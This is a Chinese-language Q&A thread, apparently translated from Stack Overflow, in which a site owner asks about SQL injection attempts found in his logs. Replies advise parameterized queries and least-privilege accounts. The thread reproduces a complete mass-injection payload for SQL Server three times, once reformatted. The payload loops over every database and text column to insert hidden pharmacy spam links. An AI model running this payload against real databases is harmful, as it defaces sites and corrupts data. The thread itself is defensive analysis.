1. 首页
  2. 问答
  3. 有人试图破解我的网站

有人试图破解我的网站

2016-04-13 44 views
2

我赶上了以下异常在我的日志:有人试图破解我的网站

mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2&lt

黑客在开始的那一刻;申报并完成的 - 。我所有的Sql查询都应该被参数化,但如果没有,我需要消除这种威胁。

我最好的选择是什么?我有一个特定的“网络”登录帐户的数据库。最小化此Web登录帐户凭据或拒绝特定的SQL对象的最佳做法是什么?

这个人想要做什么?这里是另一个黑客企图:

;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a 
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br

这里是我的日志的快照。如果你从底部到顶部看,你可以看到这个黑客正在尝试每个参数来注入他的代码。

enter image description here

来源

2016-04-13 kstubs

+0

确实很简单:确保您为这个确切原因对SQL查询进行参数化。创建一个只能访问特定数据库(或数据库)的用户帐户。安装SQL Server的服务器只拒绝来自指定IP地址的任何连接。 –

+0

获取过程。你是否在vpn上,有时是在通过服务器爬取进行备份时 – hemanjosko

+0

OWASP基金会有你需要知道的一切:https://www.owasp.org/index.php/Category:OWASP_Guide_Project –

回答

1

开始封锁IP的将启动,并确保所有的输入被转义等的地方。如果一切正常逃脱,我的意思是使用任何数据库的建议,而不是一个正则表达式你计算器发现:) SQL注入的可能性很小。

确保他们所做的并不是攻击第三方库,也就是说他们可能不是您的代码,他们正在攻击它可能是针对您正在使用的通用库的已知漏洞。

如果SQL注入不会发生,他们可能会尝试DOS/DDOS或其他下一个其他的东西来破坏您的网站。大多数网站可以做的,以减轻严重的DDOS尝试,但如果你开始阻止IP的黑客可能会很快意识到,没有水果,她正在寻找并继续前进。

我假设访问后端系统是在VPN安全即体面的密码策略等

来源

2016-04-13 05:39:08 Harry

4

至于对方表示,使用参数化的SQL查询。

这里是格式化的SQL:

DECLARE @b CURSOR; 
DECLARE @s VARCHAR(8000); 
DECLARE @w VARCHAR(99); 

SET @b=CURSOR 
FOR SELECT Db_name() 
    UNION 
    SELECT NAME 
    FROM sys.databases 
    WHERE (Has_dbaccess(NAME) != 0) 
      AND NAME NOT IN ('master', 'tempdb', 'model', 'msdb', Db_name()); 

OPEN @b; 

FETCH next FROM @b INTO @w; 

WHILE @@FETCH_STATUS = 0 
    BEGIN 
     SET @s='begin try use ' + @w 
      + 
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch' 
    ; 

    EXEC (@s); 

    FETCH next FROM @b INTO @w; 
END; 

CLOSE @b--<br/> sess: 2<

和内查询:

; 
DECLARE @c 
CURSOR;DECLARE @d VARCHAR(4000);SET @c= 
    CURSOR FOR 
    SELECT ''UPDATE [''+TABLE_NAME+''] 
    SET [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+ 
      CASE Abs(Checksum(Newid()))%10 
        WHEN 0 THEN ''''''+Char(60)+''div style=&quot;DISPLAY:none&quot;''  +char(62)+''inderal 10mg ''+char(60)+''a href=&quot;HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill&quot;''  +char(62)+''''''+ 
      CASE abs(checksum(newid()))%3 
      WHEN 0 THEN 
      ''''blog.coepd.com'''' 
      WHEN 1 THEN 
      ''''blog.coepd.com'''' 
      ELSE ''''blog.coepd.com'''' 
      END 
      +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' 
      ELSE '''''''' 
     END 
     '' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
      indid IN (0, 
        1) 
     ) 
     AND 
     data_type LIKE ''%varchar'' 
     AND 
     ( 
      character_maximum_length IN (2147483647, 
             -1) 
     );OPEN @c;FETCH next 
     FROM @c 
     INTO @d;WHILE @@FETCH_STATUS=0 
     BEGIN 
      EXEC (@d); 
      FETCH next 
      FROM @c 
      INTO @d; 

     END;CLOSE @c 
     end tryBEGIN catch 
     END catch

他们基本上是试图更新所有数据库和表中的所有文本列。

所以这只是一个垃圾邮件脚本,试图宣传一些神奇药丸。

来源

2016-04-13 06:21:31 jgauffin

相关问题

 相关问题